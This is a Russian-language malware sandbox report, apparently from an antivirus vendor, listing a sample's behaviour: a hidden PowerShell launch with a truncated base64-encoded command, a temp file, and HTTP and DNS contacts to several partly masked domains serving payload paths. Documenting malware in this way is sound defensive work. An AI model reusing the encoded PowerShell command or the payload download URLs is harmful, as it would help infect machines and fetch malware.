Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\868020.cvr
Сетевая активность
Подключается к
- 'qs##ide.com':80
- 'ts##ear.com':80
- 've####iyaahi.com':80
- 'hu###omains.com':443
- 'we###bor.com.br':80
- 'we###bor.com.br':443
- 'vi####usrangel.com':80
- 'we##vac.com':80
- 'we##vac.com':443
- 'vi##all.eu':443
TCP
Запросы HTTP GET
- http://qs##ide.com/img/0/
- http://ts##ear.com/wp-content/uploads/2015/06/pz/
- http://ve####iyaahi.com/cgi-bin/8/
- http://www.we###bor.com.br/avisos/QIU9/
- http://vi####usrangel.com/experimental/VIhMh1/
- http://we##vac.com/wp-content/GOYx/
Другие
- 'hu###omains.com':443
- 'we###bor.com.br':443
- 'we##vac.com':443
- 'vi##all.eu':443
UDP
- DNS ASK qs##ide.com
- DNS ASK ts##ear.com
- DNS ASK ve####iyaahi.com
- DNS ASK hu###omains.com
- DNS ASK we###bor.com.br
- DNS ASK vi####usrangel.com
- DNS ASK we##vac.com
- DNS ASK vi##all.eu
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...' (со скрытым окном)
